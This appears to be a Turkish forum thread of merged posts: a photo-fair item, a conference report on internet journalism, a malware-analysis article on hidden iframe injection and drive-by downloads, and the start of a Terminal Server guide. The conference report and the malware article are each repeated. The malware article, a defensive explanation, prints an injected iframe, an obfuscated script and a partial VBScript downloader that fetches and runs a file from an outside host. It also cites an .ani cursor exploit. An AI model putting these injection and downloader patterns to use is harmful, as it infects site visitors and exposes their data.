Photo& Dijital 07 fuarında yer alan Xerox standında, ziyaretçilere ve fotoğraf stüdyolarına, kişiye özel tasarlanmış düğün, nişan, bebek, tatil gibi belli temaları olan örnek fotoğraf albümleri basılı olarak gösterilecek. Özellikle düğünlerin yoğunlaştığı döneme girerken yeni evlenen çiftlere, aile ve yakın dostlarına hatıra olarak verebilecekleri ve kendi imzalarını taşıyan albüm hizmeti, tanıtılacak örnek uygulamalardan biri. Bu uygulama ile fotoğraflar için albüm alma, fotoğrafları albüme yerleştirme, sevdiklerinize ayrıca çoğaltma veya bir CD içinde unutulma gibi günlük yaşamda yaşanılan sıkıntılar da giderilmiş olacak.
Son düzenleyen vain; 13 Nisan 2007 10:45 Sebep: Mesajlar Otomatik Olarak Birleştirildi
vain - avatarı
vain
Ziyaretçi
16 Nisan 2007       Mesaj #224
vain - avatarı
Ziyaretçi
İnternete Fişi Çekilen Buzdolabı Gibi Davranılıyor
Cuma günü İstanbul’da gerçekleştirilen İnternet Medya’sı konferansının en tuhaf yönü, toplantıda sadece internet üzerinden yayın yapan ve hayatını bu şekilde idame ettiren internet yayıncılarına yer verilmeyişiydi. Başkanlığını gerçek bir internet yayıncısı olan Hadi Özışık'ın yürüttüğü İnternet Medya Derneği, internet yayıncılığı alanındaki toplantıyı internet yayıncılığının başta reklam, sonra internet gazetecilerinin statüsü, hukuki altyapı, telif hakları gibi çeşitli sorunlarının tartışılacağı bir ortam haline getirmek yerine Ulaştırma Bakanı, 4 büyük Cep Telefonu Operatörü firmanın Genel Müdürleri ve Sabah, Hürriyet, Zaman portallerinin yöneticilerinin konuşma yaptıkları bir gövde gösterisi haline getirmeyi tercih etmişti.

Bu da son dönemde "AKP internet yayıncılığını da ipotek altına almaya çalışıyor, sansür için uğraşıyor" yorumlarını arttırdı.

Nitekim, Ulaştırma Bakanı Binali Yıldırım, toplantının açılış konuşmasında bu hafta TBMM Adalet Komisyonu’nda kabul edilen internet yayıncılığına sansür getirmeye yönelik yasa tasarısı hakkında uzun uzun açıklamalar yaptı. Bakan Yıldırım'ın konuşmasının bir özetini burayı tıklayarak okuyabilirsiniz.

Bakanın konuşmasını takip eden panelde 4 telekom devinin Genel Müdürleri teknoloji konusundaki görüşlerini aktardılar. (Bkz : Ciliv : Turkcell Artık Yalnızca GSM Operatörü değil)

Ancak konferansın en ilginç paneli öğleden sonra sunulan ve Hürriyet Gazetesi’nin portalini yöneten Fatih Çekirge, Zaman Gazetesi Genel Müdürü Ekrem Dumanlı, Sabah Gazetesi Portal sorumlusu Bülent Denli, İnternethaber.com’dan Nazım Alpman, Radikal Gazetesinin internet yayınlarından sorumlu Serdar Kuzuloğlu ve hukukçu Adem Sözüer'in katıldığı ve "İnternet ve Medya" başlıklı panel oldu.

Bu panelde internet yayıncısı yani internet yayını üzerinden kazanılan para ile ayakta duran ve haberlerini kendi başına oluşturan sadece İnternethaber.com vardı.

Panel yöneticisi Mehmet Barlas’ın uçağına yetişmesi gerektiği için, bir süre sonra yerine geçmekle birlikte panel yöneticisi olmam nedeniyle ben bir konuşma yapmadım, sadece bir kaç noktayı düzeltmeye çalıştım. Çünkü klasik gazeteciler örneğin internet yayıncılarının kalitesinden ya da internetin tehlikeli olduğundan şikayet ediyorlardı.

Buna cevabı salonda da vermeye çalıştım ama burada kısaca not edeyim ; gazetecilerin son 10-15 yılda kendi aralarında yaptıkları “gazetecilik kalitesi” tartışmalarını ya da bugün gazete ve TV'larda gördüklerimizi hatırlatmak istiyorum. Ülkemizde basılı gazeteciler ne kadar kaliteli ise, internet yayıncıları da o kadar kaliteli. Çünkü her ikisi de ülkemizin insan kaynağı.

İnternette yanlış bilgilerin basılabileceği ve bu nedenle tehlikeli olduğu ifadesine ise cevabı Serdar Kuzuloğlu zaten verdi. Kuzuloğlu internetin popüler ansiklopedisi Wikipedia’da yapılan bir denemeyi anlattı. Bilerek yanlış yazılan bir ifadenin 8,5 dakika içinde bir okuyucu tarafından ikaz edildiğini söyleyen Kuzuloğlu’nun ifadesi, bir kere yanlış bilgiyle basılmış gazetenin düzeltilme olanağı olmadığını düşünürsek, bu bir tehlike ise ancak gazeteler için düşünülebilir dedirtiyor.

İnternetin akşam TV haberleri ile sabah gazetesi arasında yer aldığı ve internet haberciliğinin her an ulaşılabilir olduğuna vurgu yapılan panelde konuşmacıların ifadeleri şu şekildeydi :

Fatih Çekirge; İnternette İnanılmaz Olanaklar Var

Hürriyet Gazetesinin portalini yöneten Çekirge portalde yaptığı değişiklikleri ve özellikle Foto Analiz bölümün anlattı ve şöyle dedi ;

  • Kağıttan gelen birisiyim. Şimdi bakıyorum gazetelerde yapmaya çalıştığımız yeniliklerde aslında bugünün internetinin sağladığı olanakları aramışız. İnanılmaz bir olanaklar yelpazesi var internette. Gazete ve televizyonun yapamadığı herşeyi yapıyor gazete interneti. Bana göre gazete internetinin karşısında gazetenin hiçbir şansı yok. Televizyon ve gazete arasında en avantajlısı internet.

Çekirge geleceğin bu yönde olduğunu belirtirken sözlerinin sonunda gazete yayıncılığında aradığının interaktivite olduğunu ve bunu şimdi bulduğunu söyledi.

Kuzuloğlu : İnternet Ortamında Okunurluk Çok Daha Fazla

İnternet gazeteciliğinin de öncülerinden olarak bilinen Radikal yazarı Serdar Kuzuloğlu renkli konuşmasında, internet yayınlarının, basılı gazetelere kıyasla inanılmaz sayılarda okunma oranlarına ulaştığını söylerken, Radikal gazetesinde bu oranın 6-7 kata vardığına işaret etti.

Kuzuloğlu normal okurlar dışında en büyük trafiği % 40 ile Google'dan aldıklarını ve "arama değil takip motoru" olarak tanımladığı Google üzerinde yer almayanların internette şansı olmadığını belirtirken :

  • Türkiye'deki internet medyasını işsiz kalan gazeteciler yarattı. İnternethaber ve Habertürk böyle ortaya çıktı. Bu noktadan bakınca "iyi ki işsiz kalmışlar" diyor insan.

şeklinde yorum yaptı ve İnternette en çok ziyaret edilen yerlerin eğlence siteleri olduğunu söyledi. Kuzuloğlu vatandaş gazeteciliğinin de yükseldiğine dikkati çekti.

İnternetteki İlk Türk Gazetesi Zaman Oldu

Zaman Gazetesi'nin Genel Yayın Yönetmeni Ekrem Dumanlı, kendisinin internetle çok ilgili olmadığını ama Zaman Gazetesi'nin internette yayınlanan ilk gazete olduğunu söyledi. Dumanlı interneti çok övenler olduğu gibi, çok şikayet edenler de olduğunu belirtti :

  • Çok önemli bir bilgi kaynağı ama dikkatle ele alınmazsa bilgi çöplüğü haline gelebilir. İnternet bilgilendirme ve eğlence amaçlı. Zaman içinde markalaşma olacak. Bazı siteler ve bazı kaynaklar itibar kazanacak. Bu biraz yapılacak habercilik ve sorumluluk duygusuna bağlı.

dedi. Dumanlı, İnternet'in gazeteleri bitirmeyeceğini, bazı ara formüllerin çıkacağını düşündüğünü söyledi.

Denli : İnternette İnsan Kapasitesi Henüz yeterli Değil

Sabah Gazetesi portalinin yöneticisi Bülent Denli, "kağıdı eline almadan gazetecilik yapma şaşkınlığını yaşadık" şeklinde tanımladığı internet yayıncılığı konusunda sorumluluğun daha büyük olduğunu çünkü internetin daha geniş bir alana yayıldığını düşünüyor. Gazetelerde basılan yanlış haberlerin arşivlerde ve o da birkaç noktada kalacağını ama internetteki yanlışlıkların çok daha geniş yayılacağını belirterek, yeterli insan kaynağı olmadığını ve kalite gerektiğini belirtiyor.

Alpman : İnternet Motoru Durdurulan Araba Gibi Mi dolduruluyor? Üstten mi İlave ediliyor?

İnternethaber.com yazarı Nazım Alpman, bilgisayar kullanmaya en geç başlayan gazetecilerden birisi olduğunu ve internet yayıncılığının başta nasıl çalıştığını anlamadığı için, sabah hazırlanan haberlerinin ancak öğleden sonra konulduğunu anlattı. Alpman sonuçta bunu "bu iş nasıl yapılıyor. Arabanın motorunu durdurup sonra içine koyup çalıştırmak gibi mi? Yoksa üstten ilave etmek gibi mi?" sorusu ile öğrendiğini ve artık haberlerin kendisi neredeyse oradan doğrudan sayfaya yazılabildiğini anlattı.

Sözüer : İnternete Fişi Çekilecek Buzdolabı Gibi davranılıyor

İnternetin hukuki yönlerine panelin tek hukukçusu Adem Sözüer cevap verdi. Sözüer öncelikle İnternet gazetecilerinin statüsü konusunda yorumlar yaptı. Konferans başında açılış konuşması yapan Ulaştırma Bakanı kısaca internet gazetecilerinin statüsünü belirlemek istediklerini ama çıkan kanunun içine ekleyemediklerini belirtmişti. Sözüer aksine kanunun içine bunun eklenmesinde bir sakınca olmadığını düşünüyor.

Sözüer bu tanımın yapılmasının internet yayıncılarına hem hak hem de yükümlülük getireceğini hatırlattı.

Özüer kadın örgütlerinin medeni kanun çalışmalarında yaptıkları lobiciliğin çok fayda sağladığını hatırlatarak internet yayıncılarının da benzer bir hareket yapması gerektiğini, Devlet Bakanı Beşir Atalay'a öneri verilmesini önerdiğini söyledi ve site kapatmalarını, işe yaramayan buzdolabının fişinin çekilmesine benzetti.


GİZLİ TEHLİKE

Geçtiğimiz birkaç hafta içinde çeşitli Web sitelerinde kullanıcılara yönelik zararlı programların barındırıldığı haberleri artmaya başladı. Bu tür içeriklere sahip Web siteleri incelendiğinde ilginç sonuçlarla karşılaşılmaktadır. Bir çok Internet sitesinin ana sayfalarında yapılan küçük bir değişiklikle, kullanıcılar bu adreslere giriş yaptıklarında bilgisayarlarına zararlı programcıklar yerleşmektedir. Böylece kullanıcıların sistemleri uzaktan kontrol edilebilir duruma geçmiştir. Ayrıca bu tür zararlı programlar vasıtasıyla kullanıcıların özel bilgileri kontrol altına alınmaktadır. Web sayfalarında meydana getirilen bu değişiklikler gizli bir şekilde yapılmıştır. Çeşitli uygulamalara ait zaaflarının ortaya çıkması demek bilgisayar kullanıcılarının kişisel bilgilerine ulaşmada bir adım daha yaklaşmak demektir. Kişisel bilgilerin ele geçirilmesinde, internet kullanıcıların güven duygusuyla bağlandığı Web sitelerinin de rol aldığını görmekteyiz.
Tehlikeli bir oyunun içerisinde rol alan bu sitelerin çoğu bu tür içeriklere sahip olduğu konusunda habersizdir. Dışarıdan bakıldığında Web sitesi olağan gözükür. Fakat arka planda farklı bir siteye yönlendirerek ve sistem zaafından yararlanarak kullanıcın bilgisayarına zararlı program yerleşmiş olur.


att79tmp

Saldırganın, WWW Sunucusuna erişerek .htm/.php/.asp tipi içeriklerde değişiklik yaparak siteyi ziyaret edenleri başka bir adrese yönlendirmeyi sağlar. Örnek yönlendirme: [iframe src=http://tehlikeli.adres/helptop.do?id=ad003 width=100 height=0] .


att77tmp

İnternet kullanıcısı internet adresine bağlanarak sayfalar arasında gezinmeye başlar. Fakat bu esnada WEB sunucuna yerleştirilen kod parçasıyla başka bir adrese yönlendirilir. Kullanıcının sisteminde bir zaaf mevcutsa zararlı program kullanıcının bilgisayarına yerleşir.
Tüm bu işlemler kullanıcıdan habersiz gerçekleşir.


att73tmp

Kullanıcının sistemine yerleşen program, kişisel bilgileri saldırgana gönderir ya da sistemi dışarıdan müdahaleye olanak sağlayacak durumu getirir.

Bu türdeki son örneği bir donanım üreticisinin ana Web sayfasında karşılaştık. Kullanıcılar bu donanım üreticisinin ana sayfasına bağlandıklarında başka bir sayfaya yönlendirilerek zararlı kod sisteme kopyalanıyordu. Ana sayfaya şu şekilde bir eklenti yapılmıştı:
...
{/tr}
{/table}
{iframe src=http://www.ipqwe.com/app/helptop.do?id=ad003 width=100 height=0}
{/iframe}
{/td}


Kullanıcı yönlendirildiği sayfanın içeriği:
{SCRIPT LANGUAGE="JavaScript" src="./top/top.js"}{/script}{SCRIPT LANGUAGE="JavaScript"}
var g = "ODNBLTAwQzA0RkMyOUUzNiINCiAgICBYTUwxID0gIk1pYyINCiAgICBYTUwyID0gInJvc2 9md
C5YTUxIVFRQIg0KICAgIEFkb1NxYTEgPSAiQWRvZGIuUyINCi
AgICBBZG9TcWEyID0gInRyZWFtIg0KICAgIG9HZXQgICA9ICJHRVQiDQogICAgZm5hbWUxI
D0gIlRyYWR1ZS5jb20iDQogICAgU0ZPICAgID0gIlNjcmlwdGluZy5
GaWxlU3lzdGVtT2JqZWN0Ig0KI….
….
….
"; document.write(aa(g,122));{/SCRIPT}
Base64 şeklinden normal dönüşüm yapıldığında kodu şu şekilde görürüz:
….
XML2 = "rosoft.XMLHTTP"
AdoSqa1 = "Adodb.S"
AdoSqa2 = "tream"
oGet = "GET"
fname1 = "Tradue.com"
SFO = "Scripting.FileSystemObject"
SApp = "Shell.Application"
dl = "http://www.ok8vs.com/app/ppapp/next3.png"
Set df = document.createElement("object")
df.setAttribute "classid", clID1&clID2
Set x = df.CreateObject(XML1&XML2,"")
set S = df.createobject(AdoSqa1&AdoSqa2,"")
if Not Err.Number = 0 then
err.clear
document.write ("{iframe src=cc.do?id=ad003 width=100 height=0}")
else
S.type = 1
x.Open oGet, dl, False
x.Send
set F = df.createobject(SFO,"")

...

Kullanıcıdan habersiz next3.png isimli dosya sisteme indirilerek tradue.com şeklinde çalıştırılır. Ayrıca kullanıcının sisteminde güncel bir açık(.ani exploit) varsa program otomatik olarak başka bir site üzerinden sisteme kurulacaktır.
{html}
{body}
{DIV style="CURSOR: url('./bmw3.pig')"}
{/DIV}
{/body}
{/html}


Hex / bmw3.pig/


att6Btmp


Yukarıda bmw3.pig isimli dosyanın içeriği gözükmektedir. Bu “Animated Cursor” tipi dosyalarına özgü olan bir açıktan faydalanarak sisteme zararlı program yüklemeye çalışan bir dosyadır.

Web sayfalarını gezerken ansızın açılan pencereler, sistem kilitlenmeleri kötü bir haberin başlangıcı olabilir. Yeni bir güvenlik zaafı ortaya çıktığında bu istismarın tehlike boyutunu arttıracak çeşitli yöntemlerde ortaya çıkmaktadır. Bilinen yöntemleri takip etmek kolay olabilir.
Fakat Antivirus, Firewall gibi yazılımları atlatacak yöntemlerin ortaya çıkması internet kullanıcılarını zor durumda bırakması içten bile değildir.

Adım adım bir zararlı uygulamanın sisteme erişmesini inceleyelim:


att78tmp

* WEB Sayfaları arasındaki gezintiler esnasında istemediğiniz bir bağlantının meydana getirdikleri sisteminizi sizin kontrolü haricinde başka kesimlere de kontrol etme imkanı sağlayabilir. Yukarıdaki resimde görüldüğü gibi bağlantı sağlanan sayfa isteğiniz dışında bazı işlemleri gerçekleştirmeye zemin hazırlar. Burada yer alan resimler sniffer(paket koklayıcı) programı ile elde edilmiştir.


att70tmp

* Arka planda calışan sayfa işletim sistemi kontrolünü gerçekleştirmektedir. Kontrol işlemi sonucu istenilen işletim sistemini kullanıyorsanız tehlikeli bir kapının yanına yaklaştınız demektir.


att76tmp

* Resimde görüldüğü gibi işletim sisteminiz güvenlik zaafı sonucunda uzaktan sisteminize istenilen uygulama aktarılıyor.


att71tmp

* Zararlı program sisteme yüklenmeye başlamıştır. Sniffer ile tespit edilen paket kontrol edildiğinde bunun bir .exe uygulaması olduğu görülür(Başlık: MZP).

Sisteme aktarılan bu uygulama derinlemesine incelendiğinde;

Registry ayarlarında kullanıcının bilgisi dahilinde olmayan değişiklikler yapmaktadır.


att74tmp

* Bir çok zararlı programların temel huyu registry kayıtlarında kendine göre oynama yapmaktır. Böylece sistemin açılışında otomatik aktif olur ve internet Explorer gibi browserlarda kontrolü ele alır.


att72tmp

* Kendini gizlemek çeşitli yöntemler kullanır. Bunun için güvenilir bir imaj sağlamış olan herhangi bir dizine kendisini kopyalar (Örn: C:\Program Files\Microsoft Shared\MSINFO”).


att75tmp

* Zararlı uygulama kendini dizine kopyalamıştır. Fakat görünürde işletim sistemine ait uygulamalardan başka bir uygulama görünmemektedir.


att6Ctmp

* Bilindik bir komut olan “dir” komutuyla dizini incelediğimizde yine işletim sistemine ait dosyalar görünüyor.


att6Dtmp

* dir /ah komutuyla gizli dosyaları rahatlıkla görüyoruz. “NewInfo.dll” ve “system.2dt” isimli dosyalar sistemi takip etmek için kullanıcıdan habersiz bir güvenlik zaafından yararlanılarak sisteme yüklenmiştir.

Internet kullanıcılarının kişisel bilgilerini ele geçirmek için kullanıcılar tarafından sıklıkla ziyaret edilen Web sayfaları birer hedef haline dönüşmektedir. Bu kişi/kişiler Web sayfalarında görünür bir değişiklik yapmaktansa gizli kodlar ekleyerek kullanıcıların kişisel bilgilerini ele geçirme yolunu tercih ederler.

İnternete Fişi Çekilen Buzdolabı Gibi Davranılıyor
Cuma günü İstanbul’da gerçekleştirilen İnternet Medya’sı konferansının en tuhaf yönü, toplantıda sadece internet üzerinden yayın yapan ve hayatını bu şekilde idame ettiren internet yayıncılarına yer verilmeyişiydi. Başkanlığını gerçek bir internet yayıncısı olan Hadi Özışık'ın yürüttüğü İnternet Medya Derneği, internet yayıncılığı alanındaki toplantıyı internet yayıncılığının başta reklam, sonra internet gazetecilerinin statüsü, hukuki altyapı, telif hakları gibi çeşitli sorunlarının tartışılacağı bir ortam haline getirmek yerine Ulaştırma Bakanı, 4 büyük Cep Telefonu Operatörü firmanın Genel Müdürleri ve Sabah, Hürriyet, Zaman portallerinin yöneticilerinin konuşma yaptıkları bir gövde gösterisi haline getirmeyi tercih etmişti.

Bu da son dönemde "AKP internet yayıncılığını da ipotek altına almaya çalışıyor, sansür için uğraşıyor" yorumlarını arttırdı.

Nitekim, Ulaştırma Bakanı Binali Yıldırım, toplantının açılış konuşmasında bu hafta TBMM Adalet Komisyonu’nda kabul edilen internet yayıncılığına sansür getirmeye yönelik yasa tasarısı hakkında uzun uzun açıklamalar yaptı. Bakan Yıldırım'ın konuşmasının bir özetini burayı tıklayarak okuyabilirsiniz.

Bakanın konuşmasını takip eden panelde 4 telekom devinin Genel Müdürleri teknoloji konusundaki görüşlerini aktardılar. (Bkz : Ciliv : Turkcell Artık Yalnızca GSM Operatörü değil)

Ancak konferansın en ilginç paneli öğleden sonra sunulan ve Hürriyet Gazetesi’nin portalini yöneten Fatih Çekirge, Zaman Gazetesi Genel Müdürü Ekrem Dumanlı, Sabah Gazetesi Portal sorumlusu Bülent Denli, İnternethaber.com’dan Nazım Alpman, Radikal Gazetesinin internet yayınlarından sorumlu Serdar Kuzuloğlu ve hukukçu Adem Sözüer'in katıldığı ve "İnternet ve Medya" başlıklı panel oldu.

Bu panelde internet yayıncısı yani internet yayını üzerinden kazanılan para ile ayakta duran ve haberlerini kendi başına oluşturan sadece İnternethaber.com vardı.

Panel yöneticisi Mehmet Barlas’ın uçağına yetişmesi gerektiği için, bir süre sonra yerine geçmekle birlikte panel yöneticisi olmam nedeniyle ben bir konuşma yapmadım, sadece bir kaç noktayı düzeltmeye çalıştım. Çünkü klasik gazeteciler örneğin internet yayıncılarının kalitesinden ya da internetin tehlikeli olduğundan şikayet ediyorlardı.

Buna cevabı salonda da vermeye çalıştım ama burada kısaca not edeyim ; gazetecilerin son 10-15 yılda kendi aralarında yaptıkları “gazetecilik kalitesi” tartışmalarını ya da bugün gazete ve TV'larda gördüklerimizi hatırlatmak istiyorum. Ülkemizde basılı gazeteciler ne kadar kaliteli ise, internet yayıncıları da o kadar kaliteli. Çünkü her ikisi de ülkemizin insan kaynağı.

İnternette yanlış bilgilerin basılabileceği ve bu nedenle tehlikeli olduğu ifadesine ise cevabı Serdar Kuzuloğlu zaten verdi. Kuzuloğlu internetin popüler ansiklopedisi Wikipedia’da yapılan bir denemeyi anlattı. Bilerek yanlış yazılan bir ifadenin 8,5 dakika içinde bir okuyucu tarafından ikaz edildiğini söyleyen Kuzuloğlu’nun ifadesi, bir kere yanlış bilgiyle basılmış gazetenin düzeltilme olanağı olmadığını düşünürsek, bu bir tehlike ise ancak gazeteler için düşünülebilir dedirtiyor.

İnternetin akşam TV haberleri ile sabah gazetesi arasında yer aldığı ve internet haberciliğinin her an ulaşılabilir olduğuna vurgu yapılan panelde konuşmacıların ifadeleri şu şekildeydi :

Fatih Çekirge; İnternette İnanılmaz Olanaklar Var

Hürriyet Gazetesinin portalini yöneten Çekirge portalde yaptığı değişiklikleri ve özellikle Foto Analiz bölümün anlattı ve şöyle dedi ;

  • Kağıttan gelen birisiyim. Şimdi bakıyorum gazetelerde yapmaya çalıştığımız yeniliklerde aslında bugünün internetinin sağladığı olanakları aramışız. İnanılmaz bir olanaklar yelpazesi var internette. Gazete ve televizyonun yapamadığı herşeyi yapıyor gazete interneti. Bana göre gazete internetinin karşısında gazetenin hiçbir şansı yok. Televizyon ve gazete arasında en avantajlısı internet.

Çekirge geleceğin bu yönde olduğunu belirtirken sözlerinin sonunda gazete yayıncılığında aradığının interaktivite olduğunu ve bunu şimdi bulduğunu söyledi.

Kuzuloğlu : İnternet Ortamında Okunurluk Çok Daha Fazla

İnternet gazeteciliğinin de öncülerinden olarak bilinen Radikal yazarı Serdar Kuzuloğlu renkli konuşmasında, internet yayınlarının, basılı gazetelere kıyasla inanılmaz sayılarda okunma oranlarına ulaştığını söylerken, Radikal gazetesinde bu oranın 6-7 kata vardığına işaret etti.

Kuzuloğlu normal okurlar dışında en büyük trafiği % 40 ile Google'dan aldıklarını ve "arama değil takip motoru" olarak tanımladığı Google üzerinde yer almayanların internette şansı olmadığını belirtirken :

  • Türkiye'deki internet medyasını işsiz kalan gazeteciler yarattı. İnternethaber ve Habertürk böyle ortaya çıktı. Bu noktadan bakınca "iyi ki işsiz kalmışlar" diyor insan.

şeklinde yorum yaptı ve İnternette en çok ziyaret edilen yerlerin eğlence siteleri olduğunu söyledi. Kuzuloğlu vatandaş gazeteciliğinin de yükseldiğine dikkati çekti.

İnternetteki İlk Türk Gazetesi Zaman Oldu

Zaman Gazetesi'nin Genel Yayın Yönetmeni Ekrem Dumanlı, kendisinin internetle çok ilgili olmadığını ama Zaman Gazetesi'nin internette yayınlanan ilk gazete olduğunu söyledi. Dumanlı interneti çok övenler olduğu gibi, çok şikayet edenler de olduğunu belirtti :

  • Çok önemli bir bilgi kaynağı ama dikkatle ele alınmazsa bilgi çöplüğü haline gelebilir. İnternet bilgilendirme ve eğlence amaçlı. Zaman içinde markalaşma olacak. Bazı siteler ve bazı kaynaklar itibar kazanacak. Bu biraz yapılacak habercilik ve sorumluluk duygusuna bağlı.

dedi. Dumanlı, İnternet'in gazeteleri bitirmeyeceğini, bazı ara formüllerin çıkacağını düşündüğünü söyledi.

Denli : İnternette İnsan Kapasitesi Henüz yeterli Değil

Sabah Gazetesi portalinin yöneticisi Bülent Denli, "kağıdı eline almadan gazetecilik yapma şaşkınlığını yaşadık" şeklinde tanımladığı internet yayıncılığı konusunda sorumluluğun daha büyük olduğunu çünkü internetin daha geniş bir alana yayıldığını düşünüyor. Gazetelerde basılan yanlış haberlerin arşivlerde ve o da birkaç noktada kalacağını ama internetteki yanlışlıkların çok daha geniş yayılacağını belirterek, yeterli insan kaynağı olmadığını ve kalite gerektiğini belirtiyor.

Alpman : İnternet Motoru Durdurulan Araba Gibi Mi dolduruluyor? Üstten mi İlave ediliyor?

İnternethaber.com yazarı Nazım Alpman, bilgisayar kullanmaya en geç başlayan gazetecilerden birisi olduğunu ve internet yayıncılığının başta nasıl çalıştığını anlamadığı için, sabah hazırlanan haberlerinin ancak öğleden sonra konulduğunu anlattı. Alpman sonuçta bunu "bu iş nasıl yapılıyor. Arabanın motorunu durdurup sonra içine koyup çalıştırmak gibi mi? Yoksa üstten ilave etmek gibi mi?" sorusu ile öğrendiğini ve artık haberlerin kendisi neredeyse oradan doğrudan sayfaya yazılabildiğini anlattı.

Sözüer : İnternete Fişi Çekilecek Buzdolabı Gibi davranılıyor

İnternetin hukuki yönlerine panelin tek hukukçusu Adem Sözüer cevap verdi. Sözüer öncelikle İnternet gazetecilerinin statüsü konusunda yorumlar yaptı. Konferans başında açılış konuşması yapan Ulaştırma Bakanı kısaca internet gazetecilerinin statüsünü belirlemek istediklerini ama çıkan kanunun içine ekleyemediklerini belirtmişti. Sözüer aksine kanunun içine bunun eklenmesinde bir sakınca olmadığını düşünüyor.

Sözüer bu tanımın yapılmasının internet yayıncılarına hem hak hem de yükümlülük getireceğini hatırlattı.

Özüer kadın örgütlerinin medeni kanun çalışmalarında yaptıkları lobiciliğin çok fayda sağladığını hatırlatarak internet yayıncılarının da benzer bir hareket yapması gerektiğini, Devlet Bakanı Beşir Atalay'a öneri verilmesini önerdiğini söyledi ve site kapatmalarını, işe yaramayan buzdolabının fişinin çekilmesine benzetti.


GİZLİ TEHLİKE

Geçtiğimiz birkaç hafta içinde çeşitli Web sitelerinde kullanıcılara yönelik zararlı programların barındırıldığı haberleri artmaya başladı. Bu tür içeriklere sahip Web siteleri incelendiğinde ilginç sonuçlarla karşılaşılmaktadır. Bir çok Internet sitesinin ana sayfalarında yapılan küçük bir değişiklikle, kullanıcılar bu adreslere giriş yaptıklarında bilgisayarlarına zararlı programcıklar yerleşmektedir. Böylece kullanıcıların sistemleri uzaktan kontrol edilebilir duruma geçmiştir. Ayrıca bu tür zararlı programlar vasıtasıyla kullanıcıların özel bilgileri kontrol altına alınmaktadır. Web sayfalarında meydana getirilen bu değişiklikler gizli bir şekilde yapılmıştır. Çeşitli uygulamalara ait zaaflarının ortaya çıkması demek bilgisayar kullanıcılarının kişisel bilgilerine ulaşmada bir adım daha yaklaşmak demektir. Kişisel bilgilerin ele geçirilmesinde, internet kullanıcıların güven duygusuyla bağlandığı Web sitelerinin de rol aldığını görmekteyiz.
Tehlikeli bir oyunun içerisinde rol alan bu sitelerin çoğu bu tür içeriklere sahip olduğu konusunda habersizdir. Dışarıdan bakıldığında Web sitesi olağan gözükür. Fakat arka planda farklı bir siteye yönlendirerek ve sistem zaafından yararlanarak kullanıcın bilgisayarına zararlı program yerleşmiş olur.


att79tmp

Saldırganın, WWW Sunucusuna erişerek .htm/.php/.asp tipi içeriklerde değişiklik yaparak siteyi ziyaret edenleri başka bir adrese yönlendirmeyi sağlar. Örnek yönlendirme: [iframe src=http://tehlikeli.adres/helptop.do?id=ad003 width=100 height=0] .


att77tmp

İnternet kullanıcısı internet adresine bağlanarak sayfalar arasında gezinmeye başlar. Fakat bu esnada WEB sunucuna yerleştirilen kod parçasıyla başka bir adrese yönlendirilir. Kullanıcının sisteminde bir zaaf mevcutsa zararlı program kullanıcının bilgisayarına yerleşir.
Tüm bu işlemler kullanıcıdan habersiz gerçekleşir.


att73tmp

Kullanıcının sistemine yerleşen program, kişisel bilgileri saldırgana gönderir ya da sistemi dışarıdan müdahaleye olanak sağlayacak durumu getirir.

Bu türdeki son örneği bir donanım üreticisinin ana Web sayfasında karşılaştık. Kullanıcılar bu donanım üreticisinin ana sayfasına bağlandıklarında başka bir sayfaya yönlendirilerek zararlı kod sisteme kopyalanıyordu. Ana sayfaya şu şekilde bir eklenti yapılmıştı:
...
{/tr}
{/table}
{iframe src=http://www.ipqwe.com/app/helptop.do?id=ad003 width=100 height=0}
{/iframe}
{/td}


Kullanıcı yönlendirildiği sayfanın içeriği:
{SCRIPT LANGUAGE="JavaScript" src="./top/top.js"}{/script}{SCRIPT LANGUAGE="JavaScript"}
var g = "ODNBLTAwQzA0RkMyOUUzNiINCiAgICBYTUwxID0gIk1pYyINCiAgICBYTUwyID0gInJvc2 9md
C5YTUxIVFRQIg0KICAgIEFkb1NxYTEgPSAiQWRvZGIuUyINCi
AgICBBZG9TcWEyID0gInRyZWFtIg0KICAgIG9HZXQgICA9ICJHRVQiDQogICAgZm5hbWUxI
D0gIlRyYWR1ZS5jb20iDQogICAgU0ZPICAgID0gIlNjcmlwdGluZy5
GaWxlU3lzdGVtT2JqZWN0Ig0KI….
….
….
"; document.write(aa(g,122));{/SCRIPT}
Base64 şeklinden normal dönüşüm yapıldığında kodu şu şekilde görürüz:
….
XML2 = "rosoft.XMLHTTP"
AdoSqa1 = "Adodb.S"
AdoSqa2 = "tream"
oGet = "GET"
fname1 = "Tradue.com"
SFO = "Scripting.FileSystemObject"
SApp = "Shell.Application"
dl = "http://www.ok8vs.com/app/ppapp/next3.png"
Set df = document.createElement("object")
df.setAttribute "classid", clID1&clID2
Set x = df.CreateObject(XML1&XML2,"")
set S = df.createobject(AdoSqa1&AdoSqa2,"")
if Not Err.Number = 0 then
err.clear
document.write ("{iframe src=cc.do?id=ad003 width=100 height=0}")
else
S.type = 1
x.Open oGet, dl, False
x.Send
set F = df.createobject(SFO,"")

...

Kullanıcıdan habersiz next3.png isimli dosya sisteme indirilerek tradue.com şeklinde çalıştırılır. Ayrıca kullanıcının sisteminde güncel bir açık(.ani exploit) varsa program otomatik olarak başka bir site üzerinden sisteme kurulacaktır.
{html}
{body}
{DIV style="CURSOR: url('./bmw3.pig')"}
{/DIV}
{/body}
{/html}

Terminal Server Kurulum - Yapılandırma


Günümüzde sirket aglarinda sikça kullanilan,clientlarin servera erisimini saglayan bir servistir.Gerek duyulup kurulmasini saglayan bir kaç neden vardir.Bunlar genelde düsük yapilandirmaya sahip clientlarin (düsük Ram ve Cpu) kendi makinalarinda çalistiramadiklari uygulamalari (Excel,Access) kullanma gereklilikleri,merkezi bir veritabanina bagli uygulamalara erisip islem gerçeklestirme veya uzaktan yönetimde kolaylik saglama gerekliligi gibi nedenler sayilabilir.. Bunlarin kisaca açiklarsak; sirket içerisindeki tüm eski bilgisayarlarda genel olarak sik kullanilan word,excel veya database uygulamalarini çalistirmakta zorlaniyorsak ve açildiginda islem yapamayacak kadar agir çalistigindan sikayetçiysek Terminal Server baglantisiyla bu sorundan kurtulabiliriz.Serverin islemci ve bellek destegiyle istedigimiz uygulamayi sanki kendi bilgisayarimizdaymiscasina rahatlikla kullanabilir ve islemlerimizi gerçeklestirebiliriz.Keza merkezi bir veri tabanina bilgi girisi gerekliligindede bu uygulama hayat kurtaran cinstendir.Merkez sirkete bagli subelerin günlük islemlerini kaydetmek için ana bilgisayara baglanarak veri tabanina bilgi girmeleri ve bunu Terminal Server araciligiyla yapmalari hem zaman hemde güvenlik açisindan (veritabaninin merkezde saklanmasi) yararlidir.

